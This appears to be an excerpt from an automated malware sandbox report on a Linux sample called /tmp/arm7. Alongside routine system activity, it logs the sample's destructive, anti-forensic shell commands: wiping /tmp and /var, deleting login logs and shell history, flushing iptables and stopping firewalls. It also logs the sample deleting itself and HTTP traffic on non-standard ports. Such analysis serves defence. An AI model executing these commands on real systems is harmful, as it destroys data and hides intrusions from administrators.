              Source: /bin/sh (PID: 5442)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5444)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              Source: /bin/sh (PID: 5552)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5554)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              Source: /bin/sh (PID: 5556)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5558)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              Source: /bin/sh (PID: 5560)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5562)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              Source: /bin/sh (PID: 5564)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5566)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/5022/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/5022/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/5147/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/5147/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1582/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1582/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/3088/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/3088/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/230/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/230/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/110/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/110/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/231/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/231/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/111/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/111/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/232/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/232/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1579/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1579/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/112/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/112/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/233/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/233/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1699/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1699/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/113/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/113/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/234/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/234/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1335/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1335/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1698/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1698/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/114/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/114/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/235/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/235/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1334/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1334/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1576/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1576/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/2302/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/2302/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/115/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/115/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/236/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/236/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/116/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/116/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/237/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/237/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/117/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/117/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/118/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/118/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/910/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/910/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/119/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/119/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/912/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/912/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/10/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/10/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/2307/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/2307/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/11/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/11/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/918/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/918/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/12/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/12/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/13/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/13/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/14/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/14/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/15/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/15/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/16/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/16/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/17/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/17/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/18/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/18/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/5279/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/5279/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1594/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1594/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/120/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/120/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/121/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/121/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1349/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1349/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/1/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/122/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/122/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/243/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/243/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/123/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/123/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/2/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/2/cmdline
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/124/status
              Source: /usr/bin/pkill (PID: 5294)File opened: /proc/124/cmdline
              Source: /usr/bin/whoopsie (PID: 5355)Directory: /nonexistent/.cacheJump to behavior
              Source: /bin/sh (PID: 5310)Iptables executable: /sbin/iptables -> /sbin/iptables -F
              Source: /bin/sh (PID: 5311)Iptables executable: /sbin/iptables -> /sbin/iptables -X
              Source: /usr/bin/whoopsie (PID: 5355)File: /var/crash (bits: gv usr: rwx grp: rwx all: rwx)Jump to behavior
              Source: /usr/sbin/gdm3 (PID: 5500)File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)Jump to behavior
              Source: /usr/sbin/gdm3 (PID: 5500)File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)Jump to behavior
              Source: /usr/sbin/gdm3 (PID: 5579)File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)Jump to behavior
              Source: /usr/sbin/gdm3 (PID: 5579)File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)Jump to behavior
              Source: /tmp/arm7 (PID: 5255)Shell command executed: /bin/sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*"
              Source: /tmp/arm7 (PID: 5262)Shell command executed: /bin/sh -c "rm -rf /var/log/wtmp"
              Source: /tmp/arm7 (PID: 5269)Shell command executed: /bin/sh -c "rm -rf /tmp/*"
              Source: /tmp/arm7 (PID: 5272)Shell command executed: /bin/sh -c "rm -rf /bin/netstat"
              Source: /tmp/arm7 (PID: 5275)Shell command executed: /bin/sh -c "iptables -F"
              Source: /tmp/arm7 (PID: 5281)Shell command executed: /bin/sh -c "pkill -9 busybox"
              Source: /tmp/arm7 (PID: 5287)Shell command executed: /bin/sh -c "pkill -9 perl"
              Source: /tmp/arm7 (PID: 5292)Shell command executed: /bin/sh -c "pkill -9 python"
              Source: /tmp/arm7 (PID: 5295)Shell command executed: /bin/sh -c "service iptables stop"
              Source: /tmp/arm7 (PID: 5308)Shell command executed: /bin/sh -c "/sbin/iptables -F; /sbin/iptables -X"
              Source: /tmp/arm7 (PID: 5312)Shell command executed: /bin/sh -c "service firewalld stop"
              Source: /tmp/arm7 (PID: 5323)Shell command executed: /bin/sh -c "rm -rf ~/.bash_history"
              Source: /tmp/arm7 (PID: 5326)Shell command executed: /bin/sh -c "history -c"
              Source: /usr/bin/gpu-manager (PID: 5429)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5431)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5433)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5435)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5437)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5439)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5441)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5443)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5551)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5553)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5555)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5557)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5559)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5561)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5563)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5565)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /bin/sh (PID: 5257)Rm executable: /usr/bin/rm -> rm -rf /tmp/arm7 /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf
              Source: /bin/sh (PID: 5268)Rm executable: /usr/bin/rm -> rm -rf /var/log/wtmp
              Source: /bin/sh (PID: 5271)Rm executable: /usr/bin/rm -> rm -rf /tmp/*
              Source: /bin/sh (PID: 5274)Rm executable: /usr/bin/rm -> rm -rf /bin/netstat
              Source: /bin/sh (PID: 5325)Rm executable: /usr/bin/rm -> rm -rf /root/.bash_history
              Source: /usr/bin/gpu-manager (PID: 5550)Log file created: /var/log/gpu-manager.logJump to dropped file
              Source: /usr/sbin/service (PID: 5304)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
              Source: /usr/sbin/service (PID: 5320)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Sample deletes itselfShow sources
              Source: /usr/bin/rm (PID: 5257)File: /tmp/arm7Jump to behavior
              Uses known network protocols on non-standard portsShow sources
              Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41418 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 58178 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 58178 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40188
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40202
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40220
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40240
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40256
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40268
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40272
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40276
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40288
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40304
              Source: unknownNetwork traffic detected: HTTP traffic on port 58178 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40326
              Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40334
              Source: unknownNetwork traffic detected: HTTP traffic on port 58762 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40344
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40354
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40360
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40370
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40376
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40378
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40392
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40422
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40458
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40478
              Source: unknownNetwork traffic detected: HTTP traffic on port 58762 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45674 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40486
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40496
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40502
              Source: unknownNetwork traffic detected: HTTP traffic on port 45674 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40506
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40522
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40530
              Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45674 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58762 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58178 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 40314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48656 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 45674 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38462 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48656 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48656 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 40314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 38462 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48790 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48656 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 45674 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 36468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58762 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48790 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 38462 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41586 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 36468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41586 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 36468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48656 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41586 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34132 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41234 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48790 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41586 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41234 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41234 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 34132 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 45674 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 43156 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 37215
